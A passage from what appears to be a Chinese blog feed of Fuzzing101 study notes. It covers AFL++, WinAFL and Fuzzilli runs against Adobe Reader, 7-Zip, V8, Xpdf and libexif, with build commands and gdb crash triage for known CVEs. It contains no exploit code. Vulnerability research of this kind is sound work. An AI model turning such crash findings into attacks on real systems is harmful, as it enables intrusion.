.<span class="hljs-regexp">/afl_in/</span> -o .<span class="hljs-regexp">/afl_out/</span> -t <span class="hljs-number">2000</span> -M master -- <span class="hljs-regexp">/opt/</span>Adobe<span class="hljs-regexp">/Reader9/</span>Reader<span class="hljs-regexp">/intellinux/</span>bin/acroread -toPostScript @@<br></code></pre></td></tr></table></figure><ul><li>-Q:使用qemu-mode</li><li>AFL_QEMU_PERSISTENT_ADDR:persistent mode</li><li>AFL_QEMU_PERSISTENT_GPR:记录第一次persistent周期循环开始时的GPR数据,在往后循坏开始时直接重置</li></ul><p><img src="/image-20220816161649550.png"></p><h2 id="调试-1"><a href="#调试-1" class="headerlink" title="调试"></a>调试</h2><p>直接运行是不会报错的,使用afl-qemu-trace加上QASAN查看详细报错信息。</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">AFL_USE_QASAN=<span class="hljs-number">1</span> ACRO_INSTALL_DIR=<span class="hljs-regexp">/opt/</span>Adobe<span class="hljs-regexp">/Reader9/</span>Reader ACRO_CONFIG=intellinux LD_LIBRARY_PATH=<span class="hljs-variable">$LD_LIBRARY_PATH</span>:<span class="hljs-string">'/opt/Adobe/Reader9/Reader/intellinux/lib'</span> <span class="hljs-regexp">/usr/</span>local<span class="hljs-regexp">/bin/</span>afl-qemu-trace -- <span class="hljs-regexp">/opt/</span>Adobe<span class="hljs-regexp">/Reader9/</span>Reader<span class="hljs-regexp">/intellinux/</span>bin/acroread -toPostScript <span class="hljs-number">1</span>.pdf<br></code></pre></td></tr></table></figure><p><img src="/image-20220816161624548.png"></p><ul><li>报错信息:<code>heap buffer overflow</code>,堆溢出,由于没有源码,作者也没有提怎么分析这个漏洞,所以我只能止步于此,有了解闭源的漏洞分析的师傅可以交流一下。</li></ul><h1 id="Exercise-9-7-Zip"><a href="#Exercise-9-7-Zip" class="headerlink" title="Exercise 9 - 7-Zip"></a>Exercise 9 - 7-Zip</h1><p>Windows下使用winafl进行fuzzing,这里我只能用自己的本机,所以也没有长时间开着的条件,测试能运行就算成功。</p><h2 id="安装winAFL"><a href="#安装winAFL" class="headerlink" title="安装winAFL"></a>安装winAFL</h2><p>照着流程来基本没问题。</p><p>先下一个DynamoRio,在Visual Studio2019的命令行下完成安装,只要用官方的安装器下个community版本,安装C++开发组件,其他都是默认即可。</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">mkdir</span> build32<br><span class="hljs-attribute">cd</span> build32<br><span class="hljs-attribute">cmake</span> -G<span class="hljs-string">"Visual Studio 16 2019"</span> -A Win32 .. -DDynamoRIO_DIR=F:\softwareAnalysis\Fuzzing\fuzzing_7zip\DynamoRIO-Windows-<span class="hljs-number">8</span>.<span class="hljs-number">0</span>.<span class="hljs-number">0</span>-<span class="hljs-number">1</span>\cmake<br><span class="hljs-attribute">cmake</span> --build . --config Release<br></code></pre></td></tr></table></figure><p>安装正常的话会在<code>winafl\build32\bin\Release</code>下看到afl-fuzz.exe等文件。</p><p><img src="/image-20220816165418797.png"></p><h2 id="测试运行-1"><a href="#测试运行-1" class="headerlink" title="测试运行"></a>测试运行</h2><p>用DynamoRIO测试能否运行fuzz进程</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">F</span>:\softwareAnalysis\Fuzzing\fuzzing_7zip\DynamoRIO-Windows-<span class="hljs-number">8</span>.<span class="hljs-number">0</span>.<span class="hljs-number">0</span>-<span class="hljs-number">1</span>\bin32\drrun.exe -c winafl.dll -debug -target_module <span class="hljs-number">7</span>z.exe -target_offset <span class="hljs-number">0</span>x02F3B3 -fuzz_iterations <span class="hljs-number">10</span> -nargs <span class="hljs-number">2</span> -- <span class="hljs-string">"F:\softwareAnalysis\Fuzzing\fuzzing_7zip\7-Zip\7z.exe"</span> l F:\softwareAnalysis\Fuzzing\fuzzing_7zip\afl_in\example.img<br></code></pre></td></tr></table></figure><p>DynamoRio是一个全平台的动态插桩程序,winafl基于这个工具写了动态插桩winafl.c,编译后是winafl.dll,里面实现了覆盖率插桩、基于文件的共享内存、基于管道的状态传递等功能。</p><h2 id="fuzz-3"><a href="#fuzz-3" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">afl</span>-fuzz.exe -i F:\softwareAnalysis\Fuzzing\fuzzing_7zip\afl_in -o F:\softwareAnalysis\Fuzzing\fuzzing_7zip\afl_out -t <span class="hljs-number">2000</span> -D F:\softwareAnalysis\Fuzzing\fuzzing_7zip\DynamoRIO-Windows-<span class="hljs-number">8</span>.<span class="hljs-number">0</span>.<span class="hljs-number">0</span>-<span class="hljs-number">1</span>\bin32 -- -coverage_module <span class="hljs-number">7</span>z.exe -coverage_module <span class="hljs-number">7</span>z.dll -target_module <span class="hljs-number">7</span>z.exe -target_offset <span class="hljs-number">0</span>x02F3B3 -nargs <span class="hljs-number">2</span> -- <span class="hljs-string">"F:\softwareAnalysis\Fuzzing\fuzzing_7zip\7-Zip\7z.exe"</span> e -y @@ <br></code></pre></td></tr></table></figure><ul><li>-coverage_module:指定覆盖率引导包含的文件,和上面Execise7里的AFL_LLVM_ALLOWLIST有点像</li><li>-target_offset:指定偏移,这里用了fuzzing101给的偏移量,需要减去基地址,而AFL++是不用的</li><li>-nargs:用于指定测试文件的运行参数数量,似乎不包含最后的输入文件</li></ul><p><img src="/image-20220816164555722.png"></p><h1 id="Exercise-10-V8-engine"><a href="#Exercise-10-V8-engine" class="headerlink" title="Exercise 10 - V8 engine"></a>Exercise 10 - V8 engine</h1><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-5847"><strong>CVE-2019-5847</strong></a> in v8 7.5(infinite recursion)</p><p> 做这个练习建议直接用<del>墙外的服务器</del>,我尝试用代理,结果浪费了很多时间</p><h2 id="安装Fuzzilli"><a href="#安装Fuzzilli" class="headerlink" title="安装Fuzzilli"></a>安装Fuzzilli</h2><p>先配置依赖,我用的是ubuntu20.04,和fuzzing101需要的依赖不太一样,18.04可以参考原作者的安装方法</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">sudo</span> apt install clang libicu-dev libpython2.<span class="hljs-number">7</span>-dev libtinfo5 libncurses5 libpython2.<span class="hljs-number">7</span> libz3-dev<br><span class="hljs-attribute">wget</span> https://swift.org/builds/swift-<span class="hljs-number">5</span>.<span class="hljs-number">3</span>.<span class="hljs-number">3</span>-release/ubuntu2004/swift-<span class="hljs-number">5</span>.<span class="hljs-number">3</span>.<span class="hljs-number">3</span>-RELEASE/swift-<span class="hljs-number">5</span>.<span class="hljs-number">3</span>.<span class="hljs-number">3</span>-RELEASE-ubuntu20.<span class="hljs-number">04</span>.tar.gz<br><span class="hljs-attribute">tar</span> xzvf swift-<span class="hljs-number">5</span>.<span class="hljs-number">3</span>.<span class="hljs-number">3</span>-RELEASE-ubuntu20.<span class="hljs-number">04</span>.tar.gz<br><span class="hljs-attribute">sudo</span> mv swift-<span class="hljs-number">5</span>.<span class="hljs-number">3</span>.<span class="hljs-number">3</span>-RELEASE-ubuntu20.<span class="hljs-number">04</span> /usr/share/swift<br><span class="hljs-attribute">echo</span> <span class="hljs-string">"export PATH=/usr/share/swift/usr/bin:$PATH"</span> >> ~/.bashrc<br><span class="hljs-attribute">source</span> ~/.bashrc<br></code></pre></td></tr></table></figure><p>安装fuzzilli,<a href="https://github.com/googleprojectzero/fuzzilli/">fuzzili</a>是一个针对JS引擎的fuzz工具,使用编程语言是swift</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs awk">wget https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/googleprojectzero/</span>fuzzilli<span class="hljs-regexp">/archive/</span>refs<span class="hljs-regexp">/tags/</span>v0.<span class="hljs-number">9</span>.zip<br>unzip v0.<span class="hljs-number">9</span>.zip<br>cd fuzzilli-<span class="hljs-number">0.9</span>/<br>swift build -c release -Xlinker=<span class="hljs-string">'-lrt'</span><br></code></pre></td></tr></table></figure><h2 id="安装V8-Engine"><a href="#安装V8-Engine" class="headerlink" title="安装V8 Engine"></a>安装V8 Engine</h2><p>先下载谷歌的代码管理工具depot_tools</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cd</span> <span class="hljs-variable">$HOME</span><br>git <span class="hljs-built_in">clone</span> https://chromium.googlesource.com/chromium/tools/depot_tools.git<br><span class="hljs-built_in">echo</span> <span class="hljs-string">"export PATH=`pwd`/depot_tools:<span class="hljs-variable">$PATH</span>"</span> >> ~/.bashrc<br><span class="hljs-built_in">source</span> ~/.bashrc<br></code></pre></td></tr></table></figure><p>获取v8源码</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cd</span> <span class="hljs-variable">$HOME</span><br><span class="hljs-built_in">mkdir</span> Fuzzing_v8_75 && <span class="hljs-built_in">cd</span> Fuzzing_v8_75<br>fetch v8<br><span class="hljs-built_in">cd</span> v8<br>git checkout 1ca088652d3aad04caceb648bcffef100bc4abc0<br>gclient <span class="hljs-built_in">sync</span><br></code></pre></td></tr></table></figure><ul><li>gclient sync:该命令用于同步solution的各个仓库,由于v8代码中包含多个git仓库,使用checkout后需要更新其他仓库内容</li></ul><p>进行有<code>coverage instrumentation</code>的编译,这里建议先按照原文中编译一个release版本出来,测试环境是否正常</p><p>作者少加了一个patch过程,这里补上</p><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli"><span class="hljs-keyword">cd</span> $HOME/Fuzzing_v8_75/v8<br><span class="hljs-string">./build/install-build-deps.sh</span><br>cp <span class="hljs-string">../../fuzzilli-0.9/Targets/V8/v8.patch</span> <span class="hljs-string">./</span><br><span class="hljs-keyword">patch</span> -p1 < v8.<span class="hljs-keyword">patch</span><br>gn gen out/fuzzbuild <span class="hljs-params">--args=</span>'is_debug=<span class="hljs-literal">false</span> dcheck_always_on=<span class="hljs-literal">true</span> v8_static_library=<span class="hljs-literal">true</span> v8_enable_slow_dchecks=<span class="hljs-literal">true</span> v8_enable_v8_checks=<span class="hljs-literal">true</span> v8_enable_verify_heap=<span class="hljs-literal">true</span> v8_enable_verify_csa=<span class="hljs-literal">true</span> v8_enable_verify_predictable=<span class="hljs-literal">true</span> sanitizer_coverage_flags=<span class="hljs-string">"trace-pc-guard"</span> target_cpu=<span class="hljs-string">"x64"</span>'<br>ninja -C <span class="hljs-string">./out/fuzzbuild</span><br></code></pre></td></tr></table></figure><ul><li>gn gen:生成build文件</li></ul><p>同样可以用patch命令还原文件</p><figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs armasm"><span class="hljs-symbol">patch</span>-RE -<span class="hljs-built_in">p1</span> < <span class="hljs-built_in">v8</span>.patch<br></code></pre></td></tr></table></figure><p>运行minibrowser时如果报错,需要先加载lib库</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">sudo vi <span class="hljs-regexp">/etc/</span>ld.so.conf<br>在文件中添加webkit文件夹下lib路径<br>sudo <span class="hljs-regexp">/sbin/</span>ldconfig -v<br></code></pre></td></tr></table></figure><h2 id="fuzz-4"><a href="#fuzz-4" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">swift <span class="hljs-built_in">run</span> <span class="hljs-attribute">-Xlinker</span>=<span class="hljs-string">'-lrt'</span> -c release FuzzilliCli <span class="hljs-attribute">--profile</span>=v8 <span class="hljs-attribute">--storagePath</span>=Targets/V8/out <span class="hljs-string">'/home/ubuntu/fuzz/fuzzing_v8/v8/out/fuzzbuild/d8'</span><br></code></pre></td></tr></table></figure><p>如果这里不加存储路径,发现的crash样本会被丢弃,导致要重新跑</p><p><img src="/image-20220829135520634.png"></p><h2 id="调试-2"><a href="#调试-2" class="headerlink" title="调试"></a>调试</h2><p>这里由于可能出现语法错误,即false positive,需要先用之前编译出来的正常Release版本运行crash,判断是否存在语法错误等问题,得到不会报错的脚本,再丢进gdb里运行</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">gdb --args v8<span class="hljs-regexp">/out/</span>fuzzbuild<span class="hljs-regexp">/d8 fuzzilli-0.9/</span>Targets<span class="hljs-regexp">/V8/</span>out<span class="hljs-regexp">/crashes/</span>crash_1662073648445_9153_deterministic_4.js<br>crash_1662137004583_12367_deterministic_4.js<br></code></pre></td></tr></table></figure>]]></content>
<tags>
<tag>Fuzz</tag>
</tags>
</entry>
<entry>
<title>Fuzzing101笔记 1~5</title>
<link href="/2022/08/02/Fuzzing101%E7%AC%94%E8%AE%B0-1-5/"/>
<url>/2022/08/02/Fuzzing101%E7%AC%94%E8%AE%B0-1-5/</url>
<content type="html"><![CDATA[<p>[TOC]</p><h1 id="Exercise-1-Xpdf"><a href="#Exercise-1-Xpdf" class="headerlink" title="Exercise 1 - Xpdf"></a>Exercise 1 - Xpdf</h1><p><a href="https://www.cvedetails.com/cve/CVE-2019-13288/"><strong>CVE-2019-13288</strong></a> in XPDF 3.02 <strong>(infinite recursion)</strong></p><h2 id="安装调试目标"><a href="#安装调试目标" class="headerlink" title="安装调试目标"></a>安装调试目标</h2><p>从github等途径下载并解压</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">wget</span> https://dl.xpdfreader.com/old/xpdf-<span class="hljs-number">3</span>.<span class="hljs-number">02</span>.tar.gz<br><span class="hljs-attribute">tar</span> -xvzf xpdf-<span class="hljs-number">3</span>.<span class="hljs-number">02</span>.tar.gz<br></code></pre></td></tr></table></figure><p>安装依赖和目标</p><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs vim">sudo apt <span class="hljs-keyword">update</span> && sudo apt install -<span class="hljs-keyword">y</span> build-essential gcc<br>./configure --prefix=<span class="hljs-string">"$HOME/fuzz_target/fuzzing_xpdf/install/"</span><br><span class="hljs-keyword">make</span><br><span class="hljs-keyword">make</span> install<br></code></pre></td></tr></table></figure><p>配置configure时有各种环境变量需要设置,比较常用的有</p><ul><li>AS:汇编程序名称</li><li>CC:C编译器名称</li><li>CXX:C++编译器名称</li><li>CPP:C预编译器名称</li><li>**FLAGS:**为不同编译器名称,表示对应编译器的参数</li><li>LD:链接器名称</li><li>AR:归档器archiver名称</li><li>RANLIB:符号表添加器名称(AR和RANLIB是什么具体看<a href="https://stackoverflow.com/questions/47910759/what-is-the-difference-between-ranlib-ar-and-ld-for-making-libraries">这里</a>)</li></ul><h2 id="获取样本"><a href="#获取样本" class="headerlink" title="获取样本"></a>获取样本</h2><ol><li><p>自己随便写,fuzzer会自己变异,但效率较低</p></li><li><p>从网上(github、官网、压缩包自带)找现成的样本sample</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs awk">cd <span class="hljs-variable">$HOME</span><span class="hljs-regexp">/fuzz_target/</span>fuzzing_xpdf<br>mkdir pdf_examples && cd pdf_examples<br>wget https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/mozilla/</span>pdf.js-sample-files<span class="hljs-regexp">/raw/m</span>aster/helloworld.pdf<br>wget http:<span class="hljs-regexp">//</span>www.africau.edu<span class="hljs-regexp">/images/</span>default/sample.pdf<br>wget https:<span class="hljs-regexp">//</span>www.melbpc.org.au<span class="hljs-regexp">/wp-content/u</span>ploads<span class="hljs-regexp">/2017/</span><span class="hljs-number">10</span>/small-example-pdf-file.pdf<br></code></pre></td></tr></table></figure></li></ol><h2 id="测试安装程序运行"><a href="#测试安装程序运行" class="headerlink" title="测试安装程序运行"></a>测试安装程序运行</h2><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-variable">$HOME</span><span class="hljs-regexp">/fuzz_target/</span>fuzzing_xpdf<span class="hljs-regexp">/install/</span>bin<span class="hljs-regexp">/pdfinfo -box -meta $HOME/</span>fuzz_target<span class="hljs-regexp">/fuzzing_xpdf/</span>pdf_examples/helloworld.pdf<br></code></pre></td></tr></table></figure><h2 id="使用fuzz编译器编译(afl-clang-fast)"><a href="#使用fuzz编译器编译(afl-clang-fast)" class="headerlink" title="使用fuzz编译器编译(afl-clang-fast)"></a>使用fuzz编译器编译(afl-clang-fast)</h2><p>先删除原先的安装,重新编译安装库</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs routeros">rm -r install<br>cd xpdf-3.02<br>make clean<br><span class="hljs-built_in">export</span> <span class="hljs-attribute">LLVM_CONFIG</span>=<span class="hljs-string">"llvm-config-12"</span><br><span class="hljs-attribute">CC</span>=afl-clang-fast <span class="hljs-attribute">CXX</span>=afl-clang-fast++ ./configure <span class="hljs-attribute">--prefix</span>=<span class="hljs-string">"<span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_xpdf/install/"</span><br>make<br>make install<br></code></pre></td></tr></table></figure><h2 id="fuzz"><a href="#fuzz" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">afl-fuzz -i <span class="hljs-variable">$HOME</span><span class="hljs-regexp">/fuzz_target/</span>fuzzing_xpdf<span class="hljs-regexp">/pdf_examples/</span> -o <span class="hljs-variable">$HOME</span><span class="hljs-regexp">/fuzz_target/</span>fuzzing_xpdf<span class="hljs-regexp">/out/</span> -s <span class="hljs-number">123</span> -- <span class="hljs-variable">$HOME</span><span class="hljs-regexp">/fuzz_target/</span>fuzzing_xpdf<span class="hljs-regexp">/install/</span>bin<span class="hljs-regexp">/pdftotext @@ $HOME/</span>fuzz_target<span class="hljs-regexp">/fuzzing_xpdf/</span>output<br></code></pre></td></tr></table></figure><p>参数</p><ul><li>-i:输入样本路径</li><li>-o:输出存储路径</li><li>-s:fuzzing时随机数使用的种子,这里为了尽量保证复现结果,设为123</li><li>–:目标程序</li></ul><p>这里的<code>@@</code>不能少,虽然初始输入都来源于设置的-i参数,但我们需要根据程序读取输入的方式进行调整此参数</p><ul><li>加<code>@@</code>:被fuzz的程序从文件读取输入</li><li>不加<code>@@</code>:被fuzz的程序从标准输入输出流读取输入</li></ul><p>跑一会就能出结果</p><p><img src="/image-20220725165515904.png"></p><h2 id="动态调试"><a href="#动态调试" class="headerlink" title="动态调试"></a>动态调试</h2><p>源码编译出带调试符号的文件</p><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs abnf">make clean<br><span class="hljs-attribute">CFLAGS</span><span class="hljs-operator">=</span><span class="hljs-string">"-g -O0"</span> CXXFLAGS<span class="hljs-operator">=</span><span class="hljs-string">"-g -O0"</span> ./configure --prefix<span class="hljs-operator">=</span><span class="hljs-string">"$HOME/fuzz_target/fuzzing_xpdf/install/"</span><br>make<br>make install<br></code></pre></td></tr></table></figure><p>运行gdb</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs she">gdb --args $HOME/fuzz_target/fuzzing_xpdf/install/bin/pdftotext $HOME/fuzz_target/fuzzing_xpdf/out/default/crashes/<your_filename> $HOME/fuzz_target/fuzzing_xpdf/output<br></code></pre></td></tr></table></figure><p>追踪crash路径</p><ul><li>bt:跑出crash后查看调用路径</li></ul><p><img src="/image-20220720090635027.png"></p><ul><li>报错信息<code>Program received signal SIGSEGV, Segmentation fault</code>,存在内存泄漏</li><li>报错位置 <code>_int_malloc (av=av@entry=0x7ffff7c6bb80 <main_arena>, bytes=bytes@entry=128) at malloc.c:3679</code>,glibc报了个错,显然是堆内存出了问题</li><li>执行流信息,分析一下可以看出调用过程是循环的,判断为无限循环漏洞</li><li>根据函数调用找到漏洞位置</li></ul><p>从xpdf/Parse.cc 94行的makeStream调用,一路跟着报错往下翻就会找到这个套娃,这里就不演示了。</p><p><img src="/image-20220720100603018.png"></p><h2 id="漏洞修复"><a href="#漏洞修复" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><p>下个xpdf4.02源码对比一下就好,修复方式比较简单,加了个变量,记录循环次数,超过一定次数就结束进程。</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">wget https:<span class="hljs-regexp">//</span>dl.xpdfreader.com<span class="hljs-regexp">/old/</span>xpdf-<span class="hljs-number">4.02</span>.tar.gz<br></code></pre></td></tr></table></figure><h1 id="Exercise-2-libexif"><a href="#Exercise-2-libexif" class="headerlink" title="Exercise 2 - libexif"></a>Exercise 2 - libexif</h1><p><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3895"><strong>CVE-2009-3895</strong></a> <strong>(heap-based buffer overflow</strong>)and <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2836"><strong>CVE-2012-2836</strong></a> <strong>(Out-of-bounds Read)</strong>in libexif 0.6.14</p><h2 id="安装调试目标-1"><a href="#安装调试目标-1" class="headerlink" title="安装调试目标"></a>安装调试目标</h2><p>从github等途径下载并解压</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">tar</span> -xzvf libexif-<span class="hljs-number">0</span>_6_14-release.tar.gz<br></code></pre></td></tr></table></figure><p>安装依赖</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">apt-<span class="hljs-built_in">get</span> install<br></code></pre></td></tr></table></figure><p>配置configure并安装</p><figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs gauss">autoreconf -fvi 用于适配系统环境,简化config命令<br><span class="hljs-comment">//安装autoreconf sudo apt-get install autopoint libtool gettext libpopt-dev</span><br>./configure --<span class="hljs-keyword">enable</span>-shared=<span class="hljs-built_in">no</span> (如果是库文件,必须编译成静态库) --prefix=<span class="hljs-string">"/root/fuzz_target/fuzzing_libexif/install/"</span><br><span class="hljs-built_in">make</span><br><span class="hljs-built_in">make</span> install<br></code></pre></td></tr></table></figure><h2 id="获取交互应用(如果调试的是库,需要调用接口fuzz)"><a href="#获取交互应用(如果调试的是库,需要调用接口fuzz)" class="headerlink" title="获取交互应用(如果调试的是库,需要调用接口fuzz)"></a>获取交互应用(如果调试的是库,需要调用接口fuzz)</h2><ol><li>自己写一个c程序调用接口,用afl提供的编译器编译出来</li><li>直接找调用了库文件的应用,这是这题采用的方法</li></ol><h2 id="使用fuzz编译器编译(afl-clang-lto)"><a href="#使用fuzz编译器编译(afl-clang-lto)" class="headerlink" title="使用fuzz编译器编译(afl-clang-lto)"></a>使用fuzz编译器编译(afl-clang-lto)</h2><p>先删除原先的安装,重新编译安装库</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs routeros">make clean<br><span class="hljs-built_in">export</span> <span class="hljs-attribute">LLVM_CONFIG</span>=<span class="hljs-string">"llvm-config-12"</span><br><span class="hljs-attribute">CC</span>=/root/fuzz/AFLplusplus/afl-clang-lto ./configure <span class="hljs-attribute">--enable-shared</span>=<span class="hljs-literal">no</span> <span class="hljs-attribute">--prefix</span>=<span class="hljs-string">"/root/fuzz_target/fuzzing_libexif/install/"</span><br>make <br>make install<br></code></pre></td></tr></table></figure><p>如果编译不通过,可以加 AR=llvm-ar RANLIB=llvm-ranlib LD=afl-clang-lto</p><p>重新编译应用</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs awk">make clean<br>export LLVM_CONFIG=<span class="hljs-string">"llvm-config-12"</span><br>CC=<span class="hljs-regexp">/root/</span>fuzz<span class="hljs-regexp">/AFLplusplus/</span>afl-clang-lto .<span class="hljs-regexp">/configure --enable-shared=no --prefix="$HOME/</span>fuzz_target<span class="hljs-regexp">/fuzzing_libexif/i</span>nstall<span class="hljs-regexp">/" PKG_CONFIG_PATH=$HOME/</span>fuzz_target<span class="hljs-regexp">/fuzzing_libexif/i</span>nstall<span class="hljs-regexp">/lib/</span>pkgconfig<br>make<br>make install<br></code></pre></td></tr></table></figure><p>测试运行</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-variable">$HOME</span><span class="hljs-regexp">/fuzz_target/</span>fuzzing_libexif<span class="hljs-regexp">/install/</span>bin<span class="hljs-regexp">/exif $HOME/</span>fuzz_target<span class="hljs-regexp">/fuzzing_libexif/</span>exif-samples-master<span class="hljs-regexp">/jpg/</span>Canon_40D_photoshop_import.jpg<br></code></pre></td></tr></table></figure><h2 id="fuzz-1"><a href="#fuzz-1" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">afl-fuzz -i <span class="hljs-variable">$HOME</span><span class="hljs-regexp">/fuzz_target/</span>fuzzing_libexif<span class="hljs-regexp">/exif-samples-master/</span>jpg<span class="hljs-regexp">/ -o $HOME/</span>fuzz_target<span class="hljs-regexp">/fuzzing_libexif/</span>out<span class="hljs-regexp">/ -s 123 -- $HOME/</span>fuzz_target<span class="hljs-regexp">/fuzzing_libexif/i</span>nstall<span class="hljs-regexp">/bin/</span>exif @@<br></code></pre></td></tr></table></figure><p><img src="/image-20220725155745581.png"></p><h2 id="动态调试-1"><a href="#动态调试-1" class="headerlink" title="动态调试"></a>动态调试</h2><p>编译出带调试信息的可执行文件</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs routeros">cd libexif-libexif-0_6_14-release<br>make clean<br><span class="hljs-attribute">CFLAGS</span>=<span class="hljs-string">"-g -O0"</span> <span class="hljs-attribute">CXXFLAGS</span>=<span class="hljs-string">"-g -O0"</span> ./configure <span class="hljs-attribute">--prefix</span>=<span class="hljs-string">"<span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_libexif/install/"</span><br>make<br>make install<br><br>cd exif-exif-0_6_15-release<br>make clean<br><span class="hljs-attribute">CFLAGS</span>=<span class="hljs-string">"-g -O0"</span> <span class="hljs-attribute">CXXFLAGS</span>=<span class="hljs-string">"-g -O0"</span> <span class="hljs-attribute">PKG_CONFIG_PATH</span>=<span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_libexif/install/lib/pkgconfig ./configure <span class="hljs-attribute">--prefix</span>=<span class="hljs-string">"<span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_libexif/install/"</span> <br>make<br>make install<br></code></pre></td></tr></table></figure><p>丢进gdb,跑出crash</p><h3 id="crash1"><a href="#crash1" class="headerlink" title="crash1"></a>crash1</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">gdb</span> --args ./install/bin/exif ./out/default/crashes/id\:<span class="hljs-number">000000</span>\,sig\:<span class="hljs-number">11</span>\,src\:<span class="hljs-number">000281</span>\,time\:<span class="hljs-number">64869</span>\,execs\:<span class="hljs-number">64957</span>\,op\:havoc\,rep\:<span class="hljs-number">16</span><br></code></pre></td></tr></table></figure><p><img 